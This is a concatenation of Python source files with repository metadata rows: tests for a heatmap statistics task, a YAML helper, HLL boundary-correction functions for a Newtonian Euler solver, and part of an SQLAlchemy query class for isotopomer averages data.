                          [102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
                          [104, 'foo', 20], [104, 'bar', 21]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[1, 2, 3, 4]]  # does not match sample colnames
        with pytest.raises(ValueError) as e:
            self.task.main(numerical_arrays=numerical_arrays,
                           numericals=[],
                           categoricals=[],
                           ranking_method='mean',
                           params={},
                           id_filter=[],
                           max_rows=100,
                           subsets=subsets)
        # check the exception message, not the ExceptionInfo object itself
        assert 'data set is too small' in str(e.value)
    def test_empty_subset_equals_full_subset(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6], [102, 'foo', 10],
                          [102, 'bar', 11], [103, 'foo', 15], [103, 'bar', 16],
                          [104, 'foo', 20], [104, 'bar', 21]],
                         columns=['id', 'feature', 'value'])
        ]
        result_1 = self.task.main(numerical_arrays=numerical_arrays,
                                  numericals=[],
                                  categoricals=[],
                                  ranking_method='mean',
                                  params={},
                                  id_filter=[],
                                  max_rows=100,
                                  subsets=[])
        result_2 = self.task.main(numerical_arrays=numerical_arrays,
                                  numericals=[],
                                  categoricals=[],
                                  ranking_method='mean',
                                  params={},
                                  id_filter=[],
                                  max_rows=100,
                                  subsets=[[101, 102, 103, 104]])
        assert result_1 == result_2

    def test_multiple_numerical_array_data(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6],
                          [102, 'foo', 10], [102, 'bar', 11],
                          [103, 'foo', 15], [103, 'bar', 16],
                          [104, 'foo', 20], [104, 'bar', 21]],
                         columns=['id', 'feature', 'value']),
            pd.DataFrame([[101, 'baz', 10], [102, 'baz', 11],
                          [105, 'foo', 20], [105, 'baz', 21],
                          [106, 'bar', 15]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[101, 102, 106], [103, 104, 105]]
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='B',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        assert 'data' in result
        assert 'stats' in result

    def test_zscore_is_not_nan_if_data_misses_values(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6],
                          [102, 'foo', 10], [102, 'bar', 11],
                          [103, 'foo', 15], [103, 'bar', 16],
                          [104, 'foo', 20], [104, 'bar', 21]],
                         columns=['id', 'feature', 'value']),
            pd.DataFrame([[101, 'baz', 10], [102, 'baz', 11],
                          [105, 'foo', 20], [105, 'baz', 21],
                          [106, 'bar', 15]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[101, 102, 106], [103, 104, 105]]
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='B',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        data = result['data']
        data = pd.DataFrame(data)
        assert not np.isnan(np.min(data['zscore']))

    def test_results_are_sorted(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'A', 5], [102, 'A', 5],
                          [101, 'B', 2], [102, 'B', 2],
                          [101, 'C', 8], [102, 'C', 8],
                          [101, 'D', 10], [102, 'D', 10]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = []
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='mean',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        data = result['data']
        data = pd.DataFrame(data)
        feature_col = data['feature'].tolist()
        assert ['D', 'C', 'A', 'B', 'D', 'C', 'A', 'B'] == feature_col
        assert ['D', 'C', 'A', 'B'] == result['stats']['feature']

    def test_max_rows_works(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'A', 5], [102, 'A', 5],
                          [101, 'B', 2], [102, 'B', 2],
                          [101, 'C', 8], [102, 'C', 8],
                          [101, 'D', 10], [102, 'D', 10]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = []
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='mean',
                                params={},
                                id_filter=[],
                                max_rows=2,
                                subsets=subsets)
        data = result['data']
        data = pd.DataFrame(data)
        feature_col = data['feature'].tolist()
        assert ['D', 'C', 'D', 'C'] == feature_col
        assert result['stats']['feature'] == ['D', 'C']

    def test_sorts_correct_for_different_criteria(self):
        numerical_arrays = [
            pd.DataFrame([[101, 'foo', 5], [101, 'bar', -12],
                          [102, 'foo', 10], [102, 'bar', -25],
                          [103, 'foo', 15], [103, 'bar', -20],
                          [104, 'foo', 20], [104, 'bar', -50]],
                         columns=['id', 'feature', 'value'])
        ]
        subsets = [[101, 102], [103, 104]]
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='P.Value',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        stats = result['stats']['P.Value']
        assert all([stats[i] < stats[i + 1] for i in range(len(stats) - 1)])
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='adj.P.Val',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        stats = result['stats']['adj.P.Val']
        assert all([stats[i] < stats[i + 1] for i in range(len(stats) - 1)])
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='B',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        stats = result['stats']['B']
        assert all([stats[i] > stats[i + 1] for i in range(len(stats) - 1)])
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='logFC',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        stats = result['stats']['logFC']
        assert all([abs(stats[i]) > abs(stats[i + 1])
                    for i in range(len(stats) - 1)])
        result = self.task.main(numerical_arrays=numerical_arrays,
                                numericals=[],
                                categoricals=[],
                                ranking_method='t',
                                params={},
                                id_filter=[],
                                max_rows=100,
                                subsets=subsets)
        stats = result['stats']['t']
        assert all([stats[i] > stats[i + 1] for i in range(len(stats) - 1)])
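
# --- Editor's note (added): hedged illustration, not part of the test suite. ---
# The tests above feed HeatmapTask long-format frames with one row per
# (sample id, feature) pair; conceptually this corresponds to the wide
# feature-by-sample matrix obtained by pivoting:
def _example_long_to_wide():
    df = pd.DataFrame([[101, 'foo', 5], [101, 'bar', 6],
                       [102, 'foo', 10], [102, 'bar', 11]],
                      columns=['id', 'feature', 'value'])
    # rows = features, columns = sample ids, cells = values
    return df.pivot(index='feature', columns='id', values='value')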
| 45.420849 | 79 | 0.378103 | 990 | 11,764 | 4.365657 | 0.137374 | 0.128413 | 0.038871 | 0.068024 | 0.801712 | 0.783202 | 0.783202 | 0.783202 | 0.783202 | 0.783202 | 0 | 0.085841 | 0.483084 | 11,764 | 258 | 80 | 45.596899 | 0.624897 | 0.010881 | 0 | 0.742616 | 0 | 0 | 0.052025 | 0 | 0 | 0 | 0 | 0 | 0.07173 | 1 | 0.037975 | false | 0 | 0.016878 | 0 | 0.063291 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b9e72dde9ba2903f63645f45b7462a52f0fba94 | 108 | py | Python | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | 1 | 2017-12-14T05:35:38.000Z | 2017-12-14T05:35:38.000Z | utils/_yaml.py | kollad/turbo-ninja | 9c3f66b2af64aec01f522d19b309cfdd723e67cf | [
"MIT"
] | null | null | null | import yaml
def dumps(data):
    return yaml.safe_dump(data)


def loads(data):
    # use the safe loader; a bare yaml.load() is deprecated and unsafe on untrusted input
    return yaml.load(data, Loader=yaml.SafeLoader) | 12 | 31 | 0.694444 | 17 | 108 | 4.352941 | 0.588235 | 0.27027 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.194444 | 108 | 9 | 32 | 12 | 0.850575 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
4b104591a2ceee1fddad1c3b1d7a9f73c0483936 | 41 | py | Python | src/py_tr/__init__.py | deye/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | 8 | 2020-09-21T09:37:19.000Z | 2021-05-26T11:10:48.000Z | src/py_tr/__init__.py | omni-vi/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | null | null | null | src/py_tr/__init__.py | omni-vi/pytr | 72e42fee2c6315ecb783f7f4e7d0a252d672084c | [
"MIT"
] | 13 | 2020-05-26T20:01:30.000Z | 2021-01-20T13:57:56.000Z | from py_tr.py_tr import TradeRepublicApi
| 20.5 | 40 | 0.878049 | 7 | 41 | 4.857143 | 0.714286 | 0.235294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b106705a857be096ac9be99b25cacf96ee53fda | 9,165 | py | Python | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | nilsvu/spectre | 1455b9a8d7e92db8ad600c66f54795c29c3052ee | [
"MIT"
] | 117 | 2017-04-08T22:52:48.000Z | 2022-03-25T07:23:36.000Z | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | GitHimanshuc/spectre | 4de4033ba36547113293fe4dbdd77591485a4aee | [
"MIT"
] | 3,177 | 2017-04-07T21:10:18.000Z | 2022-03-31T23:55:59.000Z | tests/Unit/Evolution/Systems/NewtonianEuler/BoundaryCorrections/Hll.py | geoffrey4444/spectre | 9350d61830b360e2d5b273fdd176dcc841dbefb0 | [
"MIT"
] | 85 | 2017-04-07T19:36:13.000Z | 2022-03-01T10:21:00.000Z | # Distributed under the MIT License.
# See LICENSE.txt for details.
import numpy as np
def dg_package_data_mass_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return mass_density


def dg_package_data_momentum_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return momentum_density


def dg_package_data_energy_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return energy_density


def dg_package_data_normal_dot_flux_mass_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return np.einsum("i,i", normal_covector, flux_mass_density)


def dg_package_data_normal_dot_flux_momentum_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return np.einsum("i,ij->j", normal_covector, flux_momentum_density)


def dg_package_data_normal_dot_flux_energy_density(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    return np.einsum("i,i", normal_covector, flux_energy_density)


def dg_package_data_largest_outgoing_char_speed(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    velocity_dot_normal = np.einsum("i,i", normal_covector, velocity)
    if use_polytropic_fluid:
        polytropic_constant = 1.0e-3
        polytropic_exponent = 2.0
        sound_speed = np.sqrt(polytropic_constant * polytropic_exponent *
                              pow(mass_density, polytropic_exponent - 1.0))
    else:
        adiabatic_index = 1.3
        chi = specific_internal_energy * (adiabatic_index - 1.0)
        kappa_times_p_over_rho_squared = ((adiabatic_index - 1.0)**2 *
                                          specific_internal_energy)
        sound_speed = np.sqrt(chi + kappa_times_p_over_rho_squared)
    if normal_dot_mesh_velocity is None:
        return velocity_dot_normal + sound_speed
    else:
        return velocity_dot_normal + sound_speed - normal_dot_mesh_velocity


def dg_package_data_largest_ingoing_char_speed(
        mass_density, momentum_density, energy_density, flux_mass_density,
        flux_momentum_density, flux_energy_density, velocity,
        specific_internal_energy, normal_covector, mesh_velocity,
        normal_dot_mesh_velocity, use_polytropic_fluid):
    velocity_dot_normal = np.einsum("i,i", normal_covector, velocity)
    if use_polytropic_fluid:
        polytropic_constant = 1.0e-3
        polytropic_exponent = 2.0
        sound_speed = np.sqrt(polytropic_constant * polytropic_exponent *
                              pow(mass_density, polytropic_exponent - 1.0))
    else:
        adiabatic_index = 1.3
        chi = specific_internal_energy * (adiabatic_index - 1.0)
        kappa_times_p_over_rho_squared = ((adiabatic_index - 1.0)**2 *
                                          specific_internal_energy)
        sound_speed = np.sqrt(chi + kappa_times_p_over_rho_squared)
    if normal_dot_mesh_velocity is None:
        return velocity_dot_normal - sound_speed
    else:
        return velocity_dot_normal - sound_speed - normal_dot_mesh_velocity


def dg_boundary_terms_mass_density(
        interior_mass_density, interior_momentum_density,
        interior_energy_density, interior_normal_dot_flux_mass_density,
        interior_normal_dot_flux_momentum_density,
        interior_normal_dot_flux_energy_density,
        interior_largest_outgoing_char_speed,
        interior_largest_ingoing_char_speed, exterior_mass_density,
        exterior_momentum_density, exterior_energy_density,
        exterior_normal_dot_flux_mass_density,
        exterior_normal_dot_flux_momentum_density,
        exterior_normal_dot_flux_energy_density,
        exterior_largest_outgoing_char_speed,
        exterior_largest_ingoing_char_speed, use_strong_form):
    lambda_max = np.maximum(
        0.,
        np.maximum(interior_largest_outgoing_char_speed,
                   -exterior_largest_ingoing_char_speed))
    lambda_min = np.minimum(
        0.,
        np.minimum(interior_largest_ingoing_char_speed,
                   -exterior_largest_outgoing_char_speed))
    if use_strong_form:
        return (lambda_min * (interior_normal_dot_flux_mass_density +
                              exterior_normal_dot_flux_mass_density) +
                lambda_max * lambda_min *
                (exterior_mass_density - interior_mass_density)) / (
                    lambda_max - lambda_min)
    else:
        return (
            (lambda_max * interior_normal_dot_flux_mass_density + lambda_min *
             exterior_normal_dot_flux_mass_density) + lambda_max * lambda_min *
            (exterior_mass_density - interior_mass_density)) / (lambda_max -
                                                                lambda_min)


def dg_boundary_terms_momentum_density(
        interior_mass_density, interior_momentum_density,
        interior_energy_density, interior_normal_dot_flux_mass_density,
        interior_normal_dot_flux_momentum_density,
        interior_normal_dot_flux_energy_density,
        interior_largest_outgoing_char_speed,
        interior_largest_ingoing_char_speed, exterior_mass_density,
        exterior_momentum_density, exterior_energy_density,
        exterior_normal_dot_flux_mass_density,
        exterior_normal_dot_flux_momentum_density,
        exterior_normal_dot_flux_energy_density,
        exterior_largest_outgoing_char_speed,
        exterior_largest_ingoing_char_speed, use_strong_form):
    lambda_max = np.maximum(
        0.,
        np.maximum(interior_largest_outgoing_char_speed,
                   -exterior_largest_ingoing_char_speed))
    lambda_min = np.minimum(
        0.,
        np.minimum(interior_largest_ingoing_char_speed,
                   -exterior_largest_outgoing_char_speed))
    if use_strong_form:
        return (lambda_min * (interior_normal_dot_flux_momentum_density +
                              exterior_normal_dot_flux_momentum_density) +
                lambda_max * lambda_min *
                (exterior_momentum_density - interior_momentum_density)) / (
                    lambda_max - lambda_min)
    else:
        return ((lambda_max * interior_normal_dot_flux_momentum_density +
                 lambda_min * exterior_normal_dot_flux_momentum_density) +
                lambda_max * lambda_min *
                (exterior_momentum_density - interior_momentum_density)) / (
                    lambda_max - lambda_min)


def dg_boundary_terms_energy_density(
        interior_mass_density, interior_momentum_density,
        interior_energy_density, interior_normal_dot_flux_mass_density,
        interior_normal_dot_flux_momentum_density,
        interior_normal_dot_flux_energy_density,
        interior_largest_outgoing_char_speed,
        interior_largest_ingoing_char_speed, exterior_mass_density,
        exterior_momentum_density, exterior_energy_density,
        exterior_normal_dot_flux_mass_density,
        exterior_normal_dot_flux_momentum_density,
        exterior_normal_dot_flux_energy_density,
        exterior_largest_outgoing_char_speed,
        exterior_largest_ingoing_char_speed, use_strong_form):
    lambda_max = np.maximum(
        0.,
        np.maximum(interior_largest_outgoing_char_speed,
                   -exterior_largest_ingoing_char_speed))
    lambda_min = np.minimum(
        0.,
        np.minimum(interior_largest_ingoing_char_speed,
                   -exterior_largest_outgoing_char_speed))
    if use_strong_form:
        return (lambda_min * (interior_normal_dot_flux_energy_density +
                              exterior_normal_dot_flux_energy_density) +
                lambda_max * lambda_min *
                (exterior_energy_density - interior_energy_density)) / (
                    lambda_max - lambda_min)
    else:
        return ((lambda_max * interior_normal_dot_flux_energy_density +
                 lambda_min * exterior_normal_dot_flux_energy_density) +
                lambda_max * lambda_min *
                (exterior_energy_density - interior_energy_density)) / (
                    lambda_max - lambda_min)
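
# --- Editor's note (added): hedged numerical sketch, not part of the test helpers. ---
# With lambda_max >= 0 >= lambda_min, the strong-form boundary term above is
#   F* = (lambda_min*(F_int + F_ext) + lambda_max*lambda_min*(U_ext - U_int))
#        / (lambda_max - lambda_min).
# A toy evaluation with made-up scalar states (all values are arbitrary):
def _example_hll_mass_density():
    zero = np.array([0.0])
    return dg_boundary_terms_mass_density(
        np.array([1.0]), zero, zero, np.array([0.5]), zero, zero,
        np.array([2.0]), np.array([-1.0]),
        np.array([1.2]), zero, zero, np.array([0.4]), zero, zero,
        np.array([2.0]), np.array([-1.0]), True)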
| 43.851675 | 79 | 0.737698 | 1,101 | 9,165 | 5.546776 | 0.069028 | 0.066317 | 0.070247 | 0.05158 | 0.976093 | 0.971344 | 0.950221 | 0.941215 | 0.92353 | 0.913378 | 0 | 0.004695 | 0.20982 | 9,165 | 208 | 80 | 44.0625 | 0.838581 | 0.006874 | 0 | 0.782857 | 0 | 0 | 0.002088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062857 | false | 0 | 0.005714 | 0.034286 | 0.16 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b274ae757de9ff1093863219bd5f0b0cbbd3c63 | 65,955 | py | Python | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | SBaaS_isotopomer/stage01_isotopomer_averages_query.py | dmccloskey/SBaaS_isotopomer | b669abd6e41034739a2c53d855005753e658c436 | [
"MIT"
] | null | null | null | #LIMS
from SBaaS_LIMS.lims_msMethod_postgresql_models import *
#SBaaS
from .stage01_isotopomer_averages_postgresql_models import *
from SBaaS_base.sbaas_base_query_update import sbaas_base_query_update
from SBaaS_base.sbaas_base_query_drop import sbaas_base_query_drop
from SBaaS_base.sbaas_base_query_initialize import sbaas_base_query_initialize
from SBaaS_base.sbaas_base_query_insert import sbaas_base_query_insert
from SBaaS_base.sbaas_base_query_select import sbaas_base_query_select
from SBaaS_base.sbaas_base_query_delete import sbaas_base_query_delete
from SBaaS_base.sbaas_template_query import sbaas_template_query
# required for numpy.round() used in the fragment-table builders below
import numpy
class stage01_isotopomer_averages_query(sbaas_template_query):
    def initialize_supportedTables(self):
        '''Set the supported tables dict for
        '''
        tables_supported = {'data_stage01_isotopomer_averages':data_stage01_isotopomer_averages,
                            'data_stage01_isotopomer_averagesNormSum':data_stage01_isotopomer_averagesNormSum,
                            };
        self.set_supportedTables(tables_supported);

    def initialize_dataStage01_isotopomer_averages(self):
        try:
            data_stage01_isotopomer_averages.__table__.create(self.engine,True);
            data_stage01_isotopomer_averagesNormSum.__table__.create(self.engine,True);
        except SQLAlchemyError as e:
            print(e);

    def drop_dataStage01_isotopomer_averages(self):
        try:
            data_stage01_isotopomer_averages.__table__.drop(self.engine,True);
            data_stage01_isotopomer_averagesNormSum.__table__.drop(self.engine,True);
        except SQLAlchemyError as e:
            print(e);
    def reset_dataStage01_isotopomer_averages(self,experiment_id_I,sample_name_abbreviations_I=[],scan_types_I=[]):
        try:
            if experiment_id_I and sample_name_abbreviations_I and scan_types_I:
                for sna in sample_name_abbreviations_I:
                    for st in scan_types_I:
                        reset = self.session.query(data_stage01_isotopomer_averages).filter(
                            data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                            data_stage01_isotopomer_averages.sample_name_abbreviation.like(sna),
                            data_stage01_isotopomer_averages.scan_type.like(st)).delete(synchronize_session=False);
                        reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
                            data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
                            data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sna),
                            data_stage01_isotopomer_averagesNormSum.scan_type.like(st)).delete(synchronize_session=False);
                self.session.commit();
            elif experiment_id_I and sample_name_abbreviations_I:
                for sna in sample_name_abbreviations_I:
                    reset = self.session.query(data_stage01_isotopomer_averages).filter(
                        data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                        data_stage01_isotopomer_averages.sample_name_abbreviation.like(sna)).delete(synchronize_session=False);
                    reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
                        data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
                        data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sna)).delete(synchronize_session=False);
                self.session.commit();
            elif experiment_id_I:
                reset = self.session.query(data_stage01_isotopomer_averages).filter(data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
                reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
                self.session.commit();
        except SQLAlchemyError as e:
            print(e);
    ## Query data from data_stage01_isotopomer_averages:
    # query normalized intensity from data_stage01_isotopomer_averages
    def get_normalizedIntensity_experimentIDAndSampleAbbreviationAndTimePointAndMetIDAndFragmentFormulaAndMassAndScanType_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,met_id_I,fragment_formula_I,fragment_mass_I,scan_type_I):
        '''Query peak data for a specific experiment_id, sample_name, met_id, and scan type'''
        try:
            data = self.session.query(data_stage01_isotopomer_averages.intensity_normalized_average,
                data_stage01_isotopomer_averages.intensity_normalized_cv,
                data_stage01_isotopomer_averages.intensity_normalized_units).filter(
                data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_averages.time_point.like(time_point_I),
                data_stage01_isotopomer_averages.fragment_formula.like(fragment_formula_I),
                data_stage01_isotopomer_averages.fragment_mass == fragment_mass_I,
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.met_id.like(met_id_I),
                data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
                data_stage01_isotopomer_averages.used_).all();
            intensity_normalized_average_O = None;
            intensity_normalized_cv_O = None;
            intensity_normalized_units_O = None;
            if not data:
                print('No normalized intensities found for the following:')
                print('sample_name_abbreviation\ttime_point\tmet_id\tfragment_formula\tfragment_mass\tscan_type');
                print((sample_name_abbreviation_I) + '\t' + str(time_point_I) + '\t' + str(met_id_I) + '\t' + str(fragment_formula_I) + '\t' + str(fragment_mass_I) + '\t' + str(scan_type_I));
                return intensity_normalized_average_O,intensity_normalized_cv_O;
            else:
                intensity_normalized_average_O = data[0][0];
                intensity_normalized_cv_O = data[0][1];
                intensity_normalized_units_O = data[0][2];
                return intensity_normalized_average_O,intensity_normalized_cv_O;
        except SQLAlchemyError as e:
            print(e);
    # query time points from data_stage01_isotopomer_averages:
    def get_timePoint_experimentID_dataStage01Averages(self,experiment_id_I):
        '''Query time points that are used from the experiment and sample name'''
        try:
            time_points = self.session.query(data_stage01_isotopomer_averages.time_point).filter(
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.used_.is_(True)).group_by(
                data_stage01_isotopomer_averages.time_point).order_by(
                data_stage01_isotopomer_averages.time_point.asc()).all();
            time_points_O = [];
            for tp in time_points: time_points_O.append(tp.time_point);
            return time_points_O;
        except SQLAlchemyError as e:
            print(e);
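
    # --- Editor's note (added): hedged usage sketch, kept as comments so the class
    # body stays valid. The constructor arguments are assumptions inherited from
    # sbaas_template_query, and 'ALEsKOs01' is a hypothetical experiment id:
    #     query = stage01_isotopomer_averages_query(session_I=session, engine_I=engine, settings_I=settings)
    #     for tp in query.get_timePoint_experimentID_dataStage01Averages('ALEsKOs01'):
    #         print(tp)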
    # query sample name abbreviations from data_stage01_isotopomer_averages:
    def get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Averages(self,experiment_id_I,sample_type_I,time_point_I):
        '''Query sample name abbreviations that are used from
        the experiment for specific time-points'''
        try:
            sample_name_abbreviations = self.session.query(
                data_stage01_isotopomer_averages.sample_name_abbreviation).filter(
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.used_.is_(True),
                data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
                data_stage01_isotopomer_averages.time_point.like(time_point_I)).group_by(
                data_stage01_isotopomer_averages.sample_name_abbreviation).order_by(
                data_stage01_isotopomer_averages.sample_name_abbreviation).all();
            sample_name_abbreviations_O = [];
            for sn in sample_name_abbreviations:
                sample_name_abbreviations_O.append(sn[0]);
            return sample_name_abbreviations_O;
        except SQLAlchemyError as e:
            print(e);

    # query scan types from data_stage01_isotopomer_averages
    def get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Averages(self,experiment_id_I,time_point_I,sample_name_abbreviations_I,sample_type_I):
        '''Query scan types that are used from the experiment for specific time-points and sample name abbreviations'''
        try:
            scan_types = self.session.query(
                data_stage01_isotopomer_averages.scan_type).filter(
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.used_.is_(True),
                data_stage01_isotopomer_averages.time_point.like(time_point_I),
                data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
                data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviations_I)).group_by(
                data_stage01_isotopomer_averages.scan_type).order_by(
                data_stage01_isotopomer_averages.scan_type).all();
            scan_types_O = [];
            for st in scan_types:
                scan_types_O.append(st[0]);
            return scan_types_O;
        except SQLAlchemyError as e:
            print(e);

    # query met_ids from data_stage01_isotopomer_averages
    def get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Averages(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I):
        '''Query met ids that are used for the experiment, sample abbreviation, time point, scan type'''
        try:
            met_ids = self.session.query(data_stage01_isotopomer_averages.met_id).filter(
                data_stage01_isotopomer_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
                data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I),
                data_stage01_isotopomer_averages.time_point.like(time_point_I),
                data_stage01_isotopomer_averages.sample_type.like(sample_type_I),
                data_stage01_isotopomer_averages.scan_type.like(scan_type_I),
                data_stage01_isotopomer_averages.used_.is_(True)).group_by(
                data_stage01_isotopomer_averages.met_id).order_by(
                data_stage01_isotopomer_averages.met_id.asc()).all();
            met_ids_O = [];
            if not(met_ids):
                print("no results found")
                print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I");
                print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I);
            else:
                for cn in met_ids:
                    met_ids_O.append(cn[0]);
            return met_ids_O;
        except SQLAlchemyError as e:
            print(e);
    # query normalized intensity from data_stage01_isotopomer_averages
